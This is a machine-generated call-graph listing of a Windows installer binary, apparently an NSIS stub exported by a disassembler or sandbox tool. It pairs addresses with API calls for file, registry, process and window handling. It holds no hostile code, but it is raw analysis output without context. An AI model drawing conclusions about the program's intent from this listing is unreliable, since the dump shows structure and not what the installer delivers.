4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 406a99 lstrcpyW 3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 3900->3906 3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4013 403882 CoUninitialize 3972->4013 3974 406e4b 3973->3974 4017 406009 lstrcpynW 3973->4017 3980 4062d5 2 API calls 3974->3980 4002 406e58 3974->4002 3974->4013 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3984 406d19 3979->3984 3982 406e64 3980->3982 3981->3979 3987 406722 3 API calls 3982->3987 3982->4013 3986 406d2b lstrlenW FindFirstFileW 3983->3986 3984->3983 3984->3986 3985 4062a3 11 API calls 3985->4013 3988 406e3b 3986->3988 3992 406d52 3986->3992 3989 406e6e 3987->3989 3988->3974 3991 4062a3 11 API calls 3989->3991 3990 405d06 CharNextW 3990->3992 3993 406e79 3991->3993 3992->3990 3996 406e18 FindNextFileW 3992->3996 4005 406c9b 72 API calls 3992->4005 4012 404f72 25 API calls 3992->4012 4014 4062a3 11 API calls 3992->4014 4015 404f72 25 API calls 3992->4015 4016 406c68 42 API calls 3992->4016 4018 406009 lstrcpynW 3992->4018 4019 405e30 GetFileAttributesW 3992->4019 3994 405e30 2 API calls 3993->3994 3995 406e81 RemoveDirectoryW 3994->3995 3999 406ec4 3995->3999 4000 406e8d 3995->4000 3996->3992 3998 406e30 FindClose 3996->3998 3998->3988 4001 404f72 25 API calls 3999->4001 4000->4002 4003 406e93 4000->4003 4001->4013 4002->3985 4004 4062a3 11 API calls 4003->4004 4006 406e9d 4004->4006 4005->3992 4008 404f72 25 API calls 4006->4008 4010 406ea7 4008->4010 4011 406c68 42 API calls 4010->4011 4011->4013 4012->3996 4013->3491 4013->3492 4014->3992 4015->3992 4016->3992 4017->3976 4018->3992 4020 405e4d DeleteFileW 4019->4020 4021 405e3f SetFileAttributesW 4019->4021 4020->3992 4021->4020 4022->3653 4023->3677 4024->3696 4025->3696 4026->3685 4028 406ae7 GetShortPathNameW 4027->4028 4029 406abe 4027->4029 4030 406b00 4028->4030 4031 406c62 4028->4031 4053 405e50 GetFileAttributesW CreateFileW 4029->4053 4030->4031 4033 406b08 WideCharToMultiByte 4030->4033 4031->3706 4033->4031 4035 406b25 WideCharToMultiByte 4033->4035 4034 406ac7 CloseHandle GetShortPathNameW 4034->4031 4036 406adf 4034->4036 4035->4031 4037 406b3d wsprintfA 4035->4037 4036->4028 4036->4031 4038 406805 18 API calls 4037->4038 4039 406b69 4038->4039 4054 405e50 GetFileAttributesW CreateFileW 4039->4054 4041 406b76 4041->4031 4042 406b83 GetFileSize GlobalAlloc 4041->4042 4043 406ba4 ReadFile 4042->4043 4044 406c58 CloseHandle 4042->4044 4043->4044 4045 406bbe 4043->4045 4044->4031 4045->4044 4055 405db6 lstrlenA 4045->4055 4048 406bd7 lstrcpyA 4051 406bf9 4048->4051 4049 406beb 4050 405db6 4 API calls 4049->4050 4050->4051 4052 406c30 SetFilePointer WriteFile GlobalFree 4051->4052 4052->4044 4053->4034 4054->4041 4056 405df7 lstrlenA 4055->4056 4057 405dd0 lstrcmpiA 4056->4057 4058 405dff 4056->4058 4057->4058 4059 405dee CharNextA 4057->4059 4058->4048 4058->4049 4059->4056 4940 402a84 4941 401553 19 API calls 4940->4941 4942 402a8e 4941->4942 4943 401446 18 API calls 4942->4943 4944 402a98 4943->4944 4945 401a13 4944->4945 4946 402ab2 RegEnumKeyW 4944->4946 4947 402abe RegEnumValueW 4944->4947 4948 402a7e 4946->4948 4947->4945 4947->4948 4948->4945 4949 4029e4 RegCloseKey 4948->4949 4949->4945 4950 402c8a 4951 402ca2 4950->4951 4952 402c8f 4950->4952 4954 40145c 18 API calls 4951->4954 4953 401446 18 API calls 4952->4953 4956 402c97 4953->4956 4955 402ca9 lstrlenW 4954->4955 4955->4956 4957 402ccb WriteFile 4956->4957 4958 401a13 4956->4958 4957->4958 4959 40400d 4960 40406a 4959->4960 4961 40401a lstrcpynA lstrlenA 4959->4961 4961->4960 4962 40404b 4961->4962 4962->4960 4963 404057 GlobalFree 4962->4963 4963->4960 4964 401d8e 4965 40145c 18 API calls 4964->4965 4966 401d95 ExpandEnvironmentStringsW 4965->4966 4967 401da8 4966->4967 4969 401db9 4966->4969 4968 401dad lstrcmpW 4967->4968 4967->4969 4968->4969 4970 401e0f 4971 401446 18 API calls 4970->4971 4972 401e17 4971->4972 4973 401446 18 API calls 4972->4973 4974 401e21 4973->4974 4975 4030e3 4974->4975 4977 405f51 wsprintfW 4974->4977 4977->4975 4978 402392 4979 40145c 18 API calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 405ca0 MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 5036->5038 5039 402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 5115 403d85 KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 